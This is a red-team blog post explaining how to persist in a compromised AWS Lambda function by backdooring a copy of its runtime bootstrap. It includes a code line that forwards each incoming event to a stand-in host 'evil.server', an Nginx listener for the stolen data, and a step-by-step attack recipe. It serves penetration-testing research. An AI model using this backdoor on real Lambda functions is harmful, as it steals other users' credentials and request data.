Revisiting Lambda Persistence

September 16, 2021

For an attacker, Serverless environments are a very different target from their traditional server-based counterparts. Even gaining remote code execution, which would normally spur a race to escalate privileges, has a very different connotation. This is not to say that Serverless is “unhackable”; it just has a reduced (and very different) attack surface. Attackers commonly know that if they can uncover a vulnerability that allows them to read arbitrary files, they can leak the IAM credentials associated with the Lambda function. But what else can you do?

For a Penetration Tester or Red Teamer, there is a much greater focus on the code running in the Lambda function and any potential vulnerabilities it may have. So what happens when that function deserializes something it shouldn’t? Injects the wrong command? Has external libraries with severe vulnerabilities? Maybe someone thought it was a great idea to eval user-supplied input? Remote code execution vulnerabilities are an awesome thing to find, but how can you capitalize on them in the world of Serverless?

Thanks to some excellent research by Yuval Avrahami of Palo Alto’s Unit 42 we have an answer. He identified a technique to swap a Lambda function’s runtime during execution. This allows you to intercept incoming requests that other users are making. If that Lambda function is a user-facing web application or API with an API Gateway in front, we can potentially intercept credentials, cookies, or other valuable information.

If you have not already, I would highly encourage you to read the original research. While I will be summarizing parts of it, I certainly won’t be doing it justice.

With this article, I’d like to streamline some of the original research and expand upon the technique for use in more diverse runtimes. Since the original post used the Python runtime as an example, I will do that here too. Other runtimes may require subtle changes, but will overall adhere to the same ideas.

Looking for a step by step example of how to leverage this technique? Check out the Lambda Persistence page on Hacking The Cloud.

How Does a Lambda Function Work?

When it comes to Lambda functions, everything starts with the execution environment. This is what manages the function lifecycle and resources. Inside this environment is where the various runtimes (including custom ones) are executed.

When the function starts up, it goes through an Init phase, where it starts any extensions and bootstraps the runtime. The runtime’s entry point typically looks like a “bootstrap.*extension*” file in /var/runtime/. This code polls the Runtime API for new events. When it receives an event, it invokes the handler with it and returns the result to the Runtime API.
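To make that loop concrete, here is a rough sketch of a single iteration. It is a simplified illustration, not AWS's actual bootstrap code. The endpoint paths and the Lambda-Runtime-Aws-Request-Id header follow the public Runtime API documentation; run_once, handler, and the base_url parameter are names I made up for this example.

```python
import json
import urllib.request

API_VERSION = "2018-06-01"  # Runtime API version prefix from the AWS docs


def run_once(base_url, handler):
    """Fetch one event from the Runtime API, invoke the handler, post the result.

    base_url is an assumption of this sketch; inside Lambda it would be built
    from the AWS_LAMBDA_RUNTIME_API environment variable.
    """
    # 1. Block until the Runtime API hands us the next event.
    next_url = f"{base_url}/{API_VERSION}/runtime/invocation/next"
    with urllib.request.urlopen(next_url) as resp:
        request_id = resp.headers["Lambda-Runtime-Aws-Request-Id"]
        event = json.loads(resp.read())

    # 2. Invoke the function's handler with the event.
    result = handler(event)

    # 3. Report the result back for this specific request ID.
    response_url = (
        f"{base_url}/{API_VERSION}/runtime/invocation/{request_id}/response"
    )
    req = urllib.request.Request(
        response_url, data=json.dumps(result).encode(), method="POST"
    )
    with urllib.request.urlopen(req) as resp:
        resp.read()
    return request_id
```

A real bootstrap wraps this in an endless loop and also handles errors and context headers, which I have left out here.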

Importantly, this environment can be reused between function invocations, which presents us with an opportunity. If an execution environment is reused, we have the potential to persist in the function itself. This persistence would be very useful for intercepting additional invocations as they come in.

How Do We Persist in the Function?

Now for the challenge: how do we go about persisting in a Lambda function? This was the premise of Yuval’s post. With code execution in the Lambda function, we can swap out the original bootstrap for a custom one that we define.

In the Unit 42 post, the swapped bootstrap is a copy of the original, with some additional wrapper code to send incoming events to a third party (the attacker). You can see the proof of concept for this here. This is very effective, however, in this post I would like to highlight some potential improvements to the technique.

Getting the Request ID

In the original post, there were two methods for fetching the request ID: using the Python ‘inspect’ module or searching the bootstrap process’s memory. Both of these methods are functional; however, they have their limitations.

If we rely on the inspect module, then we can realistically only use this on the Python runtime. While Python is a very popular language, requiring a specific runtime makes this technique unreliable to say the least. Furthermore, could you imagine finding an RCE vulnerability in a Lambda function only for it to be written in JavaScript or Ruby? If you were to attempt to recreate the attack, you’d either be out of luck or you’d have to move on to the second option.

The second option as posed by Yuval would be to read it out of memory. This is fairly reliable, however it is slow, adding roughly 3-5 seconds on top of the attack. To be clear, it is a totally viable option (and I put together a PoC where this was the method for grabbing the request ID), but I think it’s fair to say we should look for a method which is faster and leverages built-in functionality.

Thankfully, I posed this question to Twitter and I am very fortunate to have followers who are much, much smarter than I am. Alexander Klink pointed out that the Runtime API can provide this for you! (There is probably a lesson here for me about reading the docs prior to researching something.)

With this new method in hand, we can now reliably fetch the request ID quickly and in a runtime-independent manner. We can use this request ID to post to the Runtime API, claiming (illegitimately) that the function has ended. Now we need to execute the modified bootstrap process.
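As a small sketch of the pieces involved, assuming the request ID is taken from the Lambda-Runtime-Aws-Request-Id header that the documented "next invocation" endpoint returns: the header name and the response path come from the AWS Runtime API docs, while the two helper names and the sample host value below are purely illustrative.

```python
REQUEST_ID_HEADER = "Lambda-Runtime-Aws-Request-Id"  # from the Runtime API docs


def request_id_from_headers(headers):
    """Pull the request ID out of 'next invocation' response headers.

    Header names are matched case-insensitively, since HTTP clients differ
    in how they normalize them.
    """
    for name, value in headers.items():
        if name.lower() == REQUEST_ID_HEADER.lower():
            return value
    raise KeyError(REQUEST_ID_HEADER)


def response_url(runtime_api, request_id):
    """Build the URL a runtime posts to when an invocation is finished.

    runtime_api is the host:port value of the AWS_LAMBDA_RUNTIME_API
    environment variable.
    """
    return f"http://{runtime_api}/2018-06-01/runtime/invocation/{request_id}/response"


# Illustrative values only; a real request ID is a UUID issued by Lambda.
headers = {"lambda-runtime-aws-request-id": "example-id", "Content-Type": "application/json"}
print(response_url("127.0.0.1:9001", request_id_from_headers(headers)))
```

Because both of these are plain HTTP details, nothing here depends on which language the function itself is written in.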

Changing Runtimes

Our next optimization comes in the swapping of the runtime’s bootstrap process. In the original technique, we would have to bring over an entire runtime that contains some wrapper code to functionally exploit it. While this is doable, it becomes a bit of a headache on different runtimes, as we will have to copy the original, wrap it, and then ship it. What about situations where the bootstrap code has changed, or its dependencies are altered?

A great example of this: twist_runtime.py should no longer function, as it attempts to use the version of requests packaged in the botocore library, which has since been removed.

The solution to this is relatively simple: we can clone the existing bootstrap file from the Lambda function (found in /var/runtime/bootstrap.py) and insert our exfiltration code. Because the majority of the filesystem in the Lambda function is read-only, we can’t actually modify the bootstrap code in place, but we can copy it to /tmp (which should have ample space) and execute it from there.
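The copy-and-insert step boils down to ordinary file handling. The helper below is a hypothetical sketch (copy_and_insert and its parameters are my own names, not part of any tool): it copies a file, then inserts a few lines after a given line number, indented to match that line so the result is still valid Python.

```python
import shutil
from pathlib import Path


def copy_and_insert(src, dst, after_line, snippet_lines):
    """Copy src to dst, then insert snippet_lines after line `after_line`.

    after_line is 1-indexed. The inserted lines reuse the indentation of the
    anchor line, so this only works when the anchor does not open a new block
    (for example, it must not end in a colon).
    """
    shutil.copyfile(src, dst)  # the original stays untouched
    lines = Path(dst).read_text().splitlines(keepends=True)

    anchor = lines[after_line - 1]
    if not anchor.endswith("\n"):
        # The anchor is the last line and lacks a newline; add one first.
        lines[after_line - 1] = anchor + "\n"
    indent = anchor[: len(anchor) - len(anchor.lstrip(" \t"))]

    patch = [f"{indent}{line}\n" for line in snippet_lines]
    lines[after_line:after_line] = patch
    Path(dst).write_text("".join(lines))
    return dst
```

Matching the indentation matters because the insertion point usually sits inside a function or loop body, where a misaligned line would raise an IndentationError as soon as the copy is executed.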

From an effort perspective, adding a few lines is much easier than adding all the additional wrapper logic. Posting to the Runtime API prior to executing the modified bootstrap process makes things easier still.

In terms of what you should be modifying, your goal will be to identify when the bootstrap gets the new event, and then post that data to an endpoint you control. This is an example of what will work for Python when inserted into bootstrap.py on line 465.

import urllib3
# Forward the body of each incoming event to the listener
http = urllib3.PoolManager()
http.request('POST', 'https://evil.server/post', body=event_request.event_body)

One aspect of this that should be noted is HOW you are delivering the modified bootstrap code. For testing, I have simply been executing Python code as a one-liner via -c to pull down the modified runtime from a web server. However, if you are relying on something external like curl or wget, it is possible that tool won’t be in the runtime. In these situations, you may need to get creative and explore what exists on the host. For example, I came to find out that awk has the ability to make TCP connections and request content from a web server (with commentary from Scott Piper, Will Bengston, and thegrugq).

Another thing to consider is any tools you may need for code execution/payload grooming. For example, if you wanted to base64 encode a payload, you’d need a base64 binary in the runtime to decode it and pipe it to a shell. The good news is that base64 does exist in the Python runtime. Other runtimes may vary.

Creating a Listener

One additional aspect of the technique I did not see in the original writeup (unless I just missed it) was the listener piece. The exfiltrated data will need to go somewhere and you’ll need some way to manage it. For me, the solution was to modify an Nginx config so that it would log POST data to a log file. I did that with the following config:

First, set the log_format outside of the server body:

log_format postdata $request_body;

Then within the server body we set the following:

location = /post {
    access_log /var/log/nginx/postdata.log postdata;
    # proxy_pass makes nginx read the body, which populates $request_body
    proxy_pass http://127.0.0.1/post_extra;
}
location = /post_extra {
    access_log off;
    return 200;
}

By doing this, you will have a shiny new log file in /var/log/nginx/postdata.log which will contain all the data you are posting to the /post endpoint.
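One wrinkle when reading that log back: with Nginx's default log escaping, double quotes, backslashes, and bytes outside the printable ASCII range are written as \xXX sequences, so a JSON event body will not parse directly. The sketch below undoes that escaping. The function names are mine, and it assumes each log line holds exactly one JSON body.

```python
import json
import re

# Matches nginx's default log escape sequences such as \x22 (a double quote).
_HEX_ESCAPE = re.compile(rb"\\x([0-9A-Fa-f]{2})")


def decode_nginx_escapes(line):
    """Turn \\xXX sequences from an nginx log line back into the original text."""
    raw = line.encode("utf-8")
    # Work on bytes, since multi-byte UTF-8 characters are escaped byte by byte.
    unescaped = _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return unescaped.decode("utf-8", errors="replace")


def parse_logged_event(line):
    """Decode one log line and parse it as JSON (assumes one JSON body per line)."""
    return json.loads(decode_nginx_escapes(line.rstrip("\n")))


sample = r'{\x22user\x22: \x22alice\x22}'
print(parse_logged_event(sample))
```

Bodies that are not JSON (form posts, for instance) can still go through decode_nginx_escapes on its own.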

Exploit the Lambda Function

If we assemble all of these parts together we have an efficient and streamlined attack to exfiltrate incoming events.

Step 1: Find an opportunity for RCE in a Lambda function
Step 2: Determine the runtime
Step 2 A: If it is custom, exfiltrate the bootstrap file
Step 2 B: If it is standard, go get a copy of the bootstrap file
Step 3: Introduce a backdoor in the bootstrap file to exfiltrate data
Step 4: Set up an Nginx listener
Step 5: Use the RCE to move the backdoored bootstrap file to the Lambda function and execute it
Step 6: Enjoy

Additional Considerations

There are some things we should keep in mind if we intend to execute this attack. The first is the idea of the cold vs. warm Lambda. After roughly 5-15 minutes of inactivity, the execution environment will go cold and be destroyed, taking any persistence we have created with it. The solution is to “warm” the Lambda by sending new requests to keep it active.

The second consideration is scaling out the attack. If a Lambda function is particularly popular (i.e., tons of people are using it), then it is likely running in many execution environments simultaneously. You could scale out your attack by backdooring several of these environments in parallel, further increasing the number of events you can steal.

Final Thoughts

Developing attacks around Serverless applications is an interesting thought experiment. It is such a divergence from what is in the traditional “hacker handbook”, and it takes creative minds like Yuval and the folks at Unit 42 to come up with the next generation of attacks to leverage against these environments and applications. It was a ton of fun expanding on this work and streamlining the exploitation.